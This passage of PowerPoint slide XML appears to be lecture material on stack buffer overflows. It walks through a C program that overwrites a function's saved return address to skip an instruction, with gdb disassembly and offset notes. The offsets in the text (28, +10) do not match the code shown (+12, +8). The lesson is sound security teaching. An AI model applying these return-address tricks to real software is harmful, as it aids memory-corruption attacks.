              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\n”, &amp;a, buffer1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to get the address of buffer1 and a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	28 can be obtained by:  address of a – address of buffer1 – size of ret (4 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.	Why 10 in (*ret) += 10?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t> example3 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ggdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t> example3.c    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> optional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> in our case</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t> example3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	disassemble main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	Result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	Dump of assembler code for function main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481ee &lt;main+0&gt;:    push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481ef &lt;main+1&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481f1 &lt;main+3&gt;:    sub    $0x8,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481f4 &lt;main+6&gt;:    and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481f7 &lt;main+9&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481fc &lt;main+14&gt;:   sub    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x080481fe &lt;main+16&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>   $0x0,0xfffffffc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048205 &lt;main+23&gt;:   sub    $0x4,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048208 &lt;main+26&gt;:   push   $0x3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x0804820a &lt;main+28&gt;:   push   $0x2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x0804820c &lt;main+30&gt;:   push   $0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x0804820e &lt;main+32&gt;:   call   0x80481d0 &lt;function&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048213 &lt;main+37&gt;:   add    $0x10,%esp	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>when calling function() the RET will be 0x08048213 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048216 &lt;main+40&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>   $0x1,0xfffffffc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x0804821d &lt;main+47&gt;:   sub    $0x8,%esp           	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> we want to skip to here, so add 10 to RET to jump to here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048220 &lt;main+50&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>  0xfffffffc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048223 &lt;main+53&gt;:   push   $0x808efa8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048228 &lt;main+58&gt;:   call   0x80488e4 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x0804822d &lt;main+63&gt;:   add    $0x10,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048230 &lt;main+66&gt;:   leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	0x08048231 &lt;main+67&gt;:   ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	End of assembler dump.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-HK" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="700" b="1" dirty="0"/>
              <a:t>	Alternatively,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="700" b="1" baseline="0" dirty="0"/>
              <a:t> we can use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="700" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="700" b="1" baseline="0" dirty="0"/>
              <a:t> –d example3” instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-HK" altLang="zh-TW" sz="700" b="1" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="200" b="1" u="sng" dirty="0"/>
              <a:t>example3.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> c) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> *ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    ret = buffer1 + 12;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    (*ret) += 8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> x;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
              <a:solidFill>
